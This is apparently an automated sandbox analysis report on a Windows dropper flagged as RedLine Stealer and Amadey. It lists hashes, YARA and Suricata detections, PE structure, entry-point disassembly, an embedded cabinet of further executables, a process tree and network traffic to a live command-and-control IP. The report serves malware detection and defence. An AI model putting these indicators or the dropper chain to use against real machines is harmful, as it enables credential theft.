                                                                                                                                                                                                                                          SHA1:E786CC8BEE83E4A37433DDCCF9D3540E1F6533FE
                                                                                                                                                                                                                                          SHA-256:A6416CA607F03E7D02DD9C8B546113C71F421C0BA8438DAFB941D25F8CF2C9E6
                                                                                                                                                                                                                                          SHA-512:959B08126358527B794A276F6E9F818250F888D9F108B46766F6C2E50186ACC8F406ACBEB94CA97B5F0E329B27F3851003446715D5D040B5C0FEF4010011A2C3
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, Author: ditekSHen
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Entropy (8bit):7.89368932675997
                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                          File name:file.exe
                                                                                                                                                                                                                                          File size:801792
                                                                                                                                                                                                                                          MD5:f83ef0c72937a6c833bfe8d3511317e5
                                                                                                                                                                                                                                          SHA1:5312837ca61166d8ad2998cc6d3a2b594165dec8
                                                                                                                                                                                                                                          SHA256:ffdff2d87d032d30d6c3e794b6bc7b033d0cdf97a69ff32a563279e2844d3e13
                                                                                                                                                                                                                                          SHA512:6abd653dee3659bcb38d9e72e5a1b56f5ecffa3a4b6372635e9198f6b42229b285648887af2ce04417856d34ef4ba19b0fab4dd256676f76f76f8a4e09cd066c
                                                                                                                                                                                                                                          SSDEEP:12288:UMr1y90JGxs99q27rD9OQszK5NMh3u2HM9aoLokYkjwDMFyJaWDns:ZyEGxs9eQGl3xEC74FyAWQ
                                                                                                                                                                                                                                          TLSH:5705120797FCD026E4B517305EF257D31A3B7E812B24835A235E981B48B39F4A631B9B
                                                                                                                                                                                                                                          Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                                                          Entrypoint:0x406a60
                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 10
OS Version Minor: 0
File Version Major: 10
File Version Minor: 0
Subsystem Version Major: 10
Subsystem Version Minor: 0
Import Hash: 646167cce332c1c252cdcb1839e0cf48
Instruction
call 00007FE66CB32105h
jmp 00007FE66CB31A15h
push 00000058h
push 004072B8h
call 00007FE66CB321A7h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007FE66CB31A2Ah
cmp eax, esi
jne 00007FE66CB31A19h
xor esi, esi
inc esi
mov edi, esi
jmp 00007FE66CB31A22h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007FE66CB319E9h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007FE66CB31A1Ch
push 0000001Fh
call 00007FE66CB31F3Bh
pop ecx
jmp 00007FE66CB31A4Ch
cmp dword ptr [004088B0h], ebx
jne 00007FE66CB31A3Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007FE66CB31B66h
pop ecx
pop ecx
test eax, eax
je 00007FE66CB31A29h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007FE66CB31B49h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007FE66CB31A2Dh
push 004010B4h
push 004010ACh
call 00007FE66CB320F5h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0xbb4e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0xbc000 | 0xbb600 | False | 0.950375771347565 | data | 7.921406954252342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc8000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
RT_DIALOG | 0x25764 | 0x130 | data | English | United States
RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
RT_STRING | 0x25d3c | 0x520 | data | English | United States
RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
RT_STRING | 0x2678c | 0x5cc | data | English | United States
RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
RT_STRING | 0x272ec | 0x4b0 | data | English | United States
RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
RT_STRING | 0x27c50 | 0x44a | data | English | United States
RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
RT_STRING | 0x284dc | 0x3ce | data | English | United States
RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
                                                                                                                                                                                                                                          RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0x28bb00x9d80aMicrosoft Cabinet archive data, many, 645130 bytes, 2 files, at 0x2c +A "fxV11fe.exe" +A "doa18JW.exe", ID 1919, number 1, 27 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63bc0x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63c00x24dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63e40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63ec0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63f40x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc63f80xcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64040x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64080xcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64140x4dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64180x6dataEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64200x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_RCDATA0xc64280x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                          RT_GROUP_ICON0xc64300xbcdataEnglishUnited States
                                                                                                                                                                                                                                          RT_VERSION0xc64ec0x408dataEnglishUnited States
                                                                                                                                                                                                                                          RT_VERSION0xc68f40x410dataRussianRussia
                                                                                                                                                                                                                                          RT_MANIFEST0xc6d040x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Language of compilation system | Country where language is spoken
English | United States
Russian | Russia

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/10/23-11:38:31.544987 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4131 | 49696 | 193.233.20.11 | 192.168.2.4
02/10/23-11:38:44.271780 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49696 | 4131 | 192.168.2.4 | 193.233.20.11
02/10/23-11:38:29.869058 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49696 | 4131 | 192.168.2.4 | 193.233.20.11
                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.512177944 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.535294056 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.535464048 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.869057894 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.892193079 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:29.989321947 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:31.521519899 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:31.544986963 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:31.677000046 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.263556004 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.288079977 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.288135052 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.288166046 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:39.288395882 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:41.215682983 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:41.241307020 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:41.291692972 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.355961084 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.379342079 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.426852942 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.450423002 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.491636992 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.552088022 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.574949026 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.574976921 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.575495958 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.612013102 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.635152102 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.636643887 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.659801960 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.709255934 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.786338091 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.809835911 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.849903107 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.916970968 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.940216064 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.944535971 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.967725039 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.969716072 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:42.992794037 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.012335062 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.035763025 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.084203959 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.212656975 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.236876965 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.265414000 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.288861990 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.334428072 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.419570923 CET496964131192.168.2.4193.233.20.11
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.442635059 CET413149696193.233.20.11192.168.2.4
                                                                                                                                                                                                                                          Feb 10, 2023 11:38:43.443034887 CET413149696193.233.20.11192.168.2.4


                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:11:38:01
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          Imagebase:0x8d0000
                                                                                                                                                                                                                                          File size:801792 bytes
                                                                                                                                                                                                                                          MD5 hash:F83EF0C72937A6C833BFE8D3511317E5
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                          Start time:11:38:01
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                                                                                                                                                                                                                                          Imagebase:0xa00000
                                                                                                                                                                                                                                          File size:610816 bytes
                                                                                                                                                                                                                                          MD5 hash:AC6FB170803555E15DA3A1BA13CBC6D3
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                          Start time:11:38:01
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                                                                                                                                                                                                                                          Imagebase:0xa90000
                                                                                                                                                                                                                                          File size:206848 bytes
                                                                                                                                                                                                                                          MD5 hash:AFC0E8E01E2B88123841047710836075
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:11:38:02
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe
                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                          File size:11264 bytes
                                                                                                                                                                                                                                          MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                          Start time:11:38:13
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe
                                                                                                                                                                                                                                          Imagebase:0xd70000
                                                                                                                                                                                                                                          File size:179200 bytes
                                                                                                                                                                                                                                          MD5 hash:EF8079CF160510D0DA7162BC08F753D8
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, Author: ditekSHen
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                          Start time:11:38:14
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                          Imagebase:0x7ff6dbfe0000
                                                                                                                                                                                                                                          File size:69632 bytes
                                                                                                                                                                                                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                          Start time:11:38:22
                                                                                                                                                                                                                                          Start date:10/02/2023
                                                                                                                                                                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
